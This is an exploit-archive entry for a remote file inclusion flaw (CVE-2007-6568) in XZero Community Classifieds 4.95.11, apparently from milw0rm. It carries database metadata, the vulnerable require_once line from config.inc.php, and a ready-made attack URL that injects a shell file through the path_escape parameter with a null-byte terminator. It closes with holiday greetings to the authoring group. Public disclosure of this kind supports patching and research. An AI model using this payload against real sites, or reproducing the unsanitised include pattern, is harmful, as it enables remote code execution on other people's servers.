EXPLOITS

XZero Community Classifieds 4.95.11 - Remote File Inclusion

Author: Kw3[R]Ln
type: webapps
platform: php
port: 
date_added: 2007-12-25  
date_updated:   
verified: 1  
codes: OSVDB-39742;CVE-2007-6568  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4795.txt  

# XZero Community Classifieds  <= v4.95.11 Remote File Inclusion
# linK : http://www.xzeroscripts.com
# download: http://rapidshare.com/files/66809648/XZCl4.95.11.rar
#
# (c)od3d and f0unded by Kw3rLn from Romanian Security Team a.K.A http://rstzone.org
#
# we have in config.inc.php:
#    line303:    require_once("{$path_escape}ipblock.inc.php");
#
# link: http://site.com/config.inc.php?path_escape=shell.txt%00
#
# meri crismas...hohoho
# greetz to all RST [rstzone.org] MEMBERZ !

# milw0rm.com [2007-12-26]